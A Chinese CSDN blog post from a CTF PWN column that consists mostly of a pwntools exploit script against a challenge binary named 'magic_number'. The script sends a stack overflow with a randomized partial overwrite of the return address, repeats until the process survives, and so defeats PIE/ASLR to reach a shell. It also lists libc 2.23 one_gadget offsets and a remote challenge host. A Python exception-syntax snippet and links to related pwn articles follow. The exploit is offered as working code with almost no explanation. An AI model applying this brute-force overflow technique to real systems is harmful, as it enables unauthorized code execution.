【八芒星计划】pwn python PIE爆破脚本绕过ASLR 覆盖后几位

最新推荐文章于 2024-01-27 19:28:10 发布
最新推荐文章于 2024-01-27 19:28:10 发布
阅读量3.4k 收藏 4
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/108233960
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏 
from pwn import *
from LibcSearcher import * 
import time
local_file  = './magic_number'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('183.129.189.60', 10010)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims, drop=True  :r.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
list1 = ['\x02', '\x12', '\x22', '\x32', '\x42', '\x52', '\x62', '\x72', '\x82', '\x92', '\xa2', '\xb2', '\xc2', '\xd2', '\xe2', '\xf2']
list2 = ['\x00','\x01','\x02','\x03','\x04','\x05','\x06','\x07','\x08','\x09','\x0a','\x0b','\x0c','\x0d','\x0e','\x0f','\x10','\x11','\x12','\x13','\x14','\x15','\x16','\x17','\x18','\x19','\x1a','\x1b','\x1c','\x1d','\x1e','\x1f','\x20','\x21','\x22','\x23','\x24','\x25','\x26','\x27','\x28','\x29','\x2a','\x2b','\x2c','\x2d','\x2e','\x2f','\x30','\x31','\x32','\x33','\x34','\x35','\x36','\x37','\x38','\x39','\x3a','\x3b','\x3c','\x3d','\x3e','\x3f','\x40','\x41','\x42','\x43','\x44','\x45','\x46','\x47','\x48','\x49','\x4a','\x4b','\x4c','\x4d','\x4e','\x4f','\x50','\x51','\x52','\x53','\x54','\x55','\x56','\x57','\x58','\x59','\x5a','\x5b','\x5c','\x5d','\x5e','\x5f','\x60','\x61','\x62','\x63','\x64','\x65','\x66','\x67','\x68','\x69','\x6a','\x6b','\x6c','\x6d','\x6e','\x6f','\x70','\x71','\x72','\x73','\x74','\x75','\x76','\x77','\x78','\x79','\x7a','\x7b','\x7c','\x7d','\x7e','\x7f','\x80','\x81','\x82','\x83','\x84','\x85','\x86','\x87','\x88','\x89','\x8a','\x8b','\x8c','\x8d','\x8e','\x8f','\x90','\x91','\x92','\x93','\x94','\x95','\x96','\x97','\x98','\x99','\x9a','\x9b','\x9c','\x9d','\x9e','\x9f','\xa0','\xa1','\xa2','\xa3','\xa4','\xa5','\xa6','\xa7','\xa8','\xa9','\xaa','\xab','\xac','\xad','\xae','\xaf','\xb0','\xb1','\xb2','\xb3','\xb4','\xb5','\xb6','\xb7','\xb8','\xb9','\xba','\xbb','\xbc','\xbd','\xbe','\xbf','\xc0','\xc1','\xc2','\xc3','\xc4','\xc5','\xc6','\xc7','\xc8','\xc9','\xca','\xcb','\xcc','\xcd','\xce','\xcf','\xd0','\xd1','\xd2','\xd3','\xd4','\xd5','\xd6','\xd7','\xd8','\xd9','\xda','\xdb','\xdc','\xdd','\xde','\xdf','\xe0','\xe1','\xe2','\xe3','\xe4','\xe5','\xe6','\xe7','\xe8','\xe9','\xea','\xeb','\xec','\xed','\xee','\xef','\xf0','\xf1','\xf2','\xf3','\xf4','\xf5','\xf6','\xf7','\xf8','\xf9','\xfa','\xfb','\xfc','\xfd','\xfe','\xff']
list3 = ['\x02', '\x12', '\x22']
def debug(cmd=''):
     gdb.attach(r,cmd)
while True:
    local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
    remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
    select = 0
    if select == 0:
        r = process(local_file)
        #libc = ELF(local_libc)
    else:
        r = remote('183.129.189.60', 10010)
        #libc = ELF(remote_libc)
    elf = ELF(local_file)
   
    p = 'a'*0x30 + 'b'*8 + '\x26' + random.sample(list1,1)[0] + random.sample(list2,1)[0]
    #p = 'a'*0x30 + 'b'*8 + '\x16'+ random.sample(list3,1)[0] +'\xa5'
    time.sleep(5)
    se(p)
    r.recv()
    try:
        r.recv(timeout=1)
    except EOFError:     
        r.close()
        continue
    else:
        r.interactive()
        break

try:
<语句> #正常的操作
except <名字>:
<语句> #如果在try部份引发了’name’异常
except <名字>,<数据>:
<语句> #如果引发了’name’异常,获得附加的数据
else:
<语句> #如果没有异常发生执行这里

真岛忍
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019.11.6 unctf 的pwn题——简单绕过pie
DSR446的博客
11-06 2775
这篇安全客关于pie和bapass绕过写的蛮好的! 看到函数最后返回到v1(),而且上一个函数的开辟的空间比后一个函数开辟的函数大,我们想到可以在前一个函数中提早将后门函数布置好,因为弹栈并不会是栈中的数据变化,除非往栈中写数据。 我们现在就通过gdb我们需要往栈的拿个置写后门函数。 我们可以看见第一个数组的置和后面 的v2()之间隔了0xc个字节。还有需要注意的是程序是将一个函数...
二进制漏洞挖掘之栈溢出-开启PIE
ylcangel的专栏
10-18 3539
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32 内核版本:Linux 2.6.32-754.10.1.e...
暑期pwn! pwn! pang! (三):开了pie的rop绕过
qq_43342413的博客
07-12 3578
话不多说先上图: 依旧开了栈中数据不可执行保护,而且重点是,开了pie! ! ! 唉,PIE这个磨人的小妖精。 还是要想办法绕过,咱们的目的是得到libc中system和/bin.sh的地址 开启了地址随机化,每次运行的基址都不一样,所以得先得到每次程序运行的libc的基址,这里我们利用__libc_start_main -我们想办法得到程序中libc_start_main的地址,减去li...
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1420
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
pwn刷题num16----寻找地址间距,栈溢出覆盖返回地址
tbsqigongzi的博客
04-23 778
攻防世界pwn进阶区stack2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行程序,先输入数字总量,之后输入数字,会有一个菜单栏,分别实现对数字展示,添加,改变,取平均值,和退出程序五种功能。 ida看一下主函数 观察主函数,发现一处溢出数组越界漏洞,v5没有限制大小,使得
pwn】[UUCTF 2022 新生赛]easystack --pie爆破
question55的博客
11-12 272
查看程序保护发现开了pie:partial write(部分写入)就是一种利用PIE技术缺陷的bypass技术。由于内存的页载入机制,PIE的随机化只能影响到单个内存页。通常来说,一个内存页大小为0x1000,这就意味着不管地址怎么变,某条指令的后12,3个十六进制数的地址是始终不变的。因此通过覆盖EIP的后8或16 (按字节写入,每字节8)就可以快速爆破或者直接劫持EIP简单来说就是后12是不会被随机化的,接着看代码逻辑发现有个后门的函数可以getshell,但是问题是怎么溢出到这里,vuln函数
针对简单Pwn溢出题的爆破
Rog's Blog
04-19 963
爆破大法好 例子:BUUCTF rip 首先得到源程序pwn1 file pwn1 checksec pwn1 啥也没有,很好 然后拖到IDA64分析一波 发现漏洞函数,地址为 0x401186 ,很好 祭出脚本,开始爆破 from pwn import * def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact
wdb_2018_4th_pwn2(爆破随机数为0)
seaaseesa的博客
07-24 661
wdb_2018_4th_pwn2(爆破随机数为0) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,功能1栈溢出,但是有canary 功能3格式化字符串,当仅能泄露一个值。 功能2是一个递归调用,多次递归,可以在栈里多处置留下canary的值 功能9011也是一个栈溢出,但是需要正确的key才能进行。 可以使用功能3泄露libc地址,然后功能2递归多次,再使用功能1将canary的值泄露,最后通过爆破随机数,用9011功能来进行栈溢出做ROP。 随机数可以直接
funcanary[CISCN2023初赛]-爆破canary+pie
qq_53928256的博客
05-29 691
根据PIE的保护的特性我们可以知道(请先进行PIE保护的相关学习),地址的后3是不变的,所以只需要的原先返回地址的基础之上将返回地址的后三覆盖system(“/bin/cat flag”)函数调用的地址即可,即为修改为“0x231”(该地址只需要在IDA看偏移地址即可),根据“字符”查找到特殊的字符串“/bin/cat flag”,所以可能存在直接的system(“/bin/cat flag”)函数,通过追踪定,发现确实存在相应函数。先检查文件的保护以及文件的类型,保护全开,64程序。
pwn-canary绕过PIE(未完待续)
m0_75234353的博客
05-30 888
看见了fork函数,那就通过爆破得出canary对于 Canary,但是同一个进程中的不同线程的 Canary 是相同的,并且通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 打开sub_128A函数 明显的溢出发现后门函数 开始计算溢出大小0x70-0x80=104①先逐字爆破出canary的值②直接溢出到返回地址,覆盖为后门函数的地址。但这道题开了PIE保护,而PIE是代码段,数据段
dictionary:来自pwn硬糖师傅的爆破字典
05-20
dictionary 来自pwn硬糖师傅的爆破字典 ---非最终版
一键搭建pwn环境脚本
03-25
一键搭建pwn环境脚本,安装pwntools, libc-database,vim, ropper, ROPgadget,libc-debug,ssh, one_gadget, pwndbg + pwngdb, 。其中pwntools为python3库 使用方法: chmod +x init_pwn.sh ./init_pwn.sh
Python库 | pwn-machine-1.1.tar.gz
03-11
python库。 资源全名:pwn-machine-1.1.tar.gz
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
PWN入门(3)覆盖堆栈上的变量
Ba1_Ma0的博客
09-08 544
有什么不会或者是错误的地方的可以私信我,看到必回。
攻防世界PWN之Noleak(一题学了好多知识)题解
seaaseesa的博客
11-13 3696
Noleak 本题需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
CTFpwn常见保护及绕过:pie,canary
最新发布
2302_79813730的博客
01-27 2117
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
Linux pwn入门教程(7)——PIE与bypass思路
子曰小玖的博客
06-04 1995
https://bbs.ichunqiu.com/thread-43627-1-1.html 0x00 PIE简介 在之前的文章中我们提到过ASLR这一防护技术。由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用。因为ASLR技术的出现,攻击者在ROP或者向进程中写数据时不得不先进行leak,或者干脆放弃堆栈,转向bss或者其他地址固定的内存块。而PIE(position...
python安装pwn
08-12
要在Mac上安装pwn,您可以按照以下步骤进行操作: 1. 确保您的Mac已安装Homebrew包管理器。如果尚未安装,请打开终端并运行以下命令: ``` /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ``` 2. 安装pwn工具集。在终端中运行以下命令: ``` brew install pwntools ``` 3. 现在,您可以在终端中使用pwn工具集执行各种pwn任务了。您可以编写和调试漏洞利用、利用二进制漏洞等等。 请注意,pwn工具集是一个非常强大的工具集,需要一定的计算机安全和二进制知识才能使用。确保您了解自己在做什么,并且只在合法和授权的范围内使用它。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值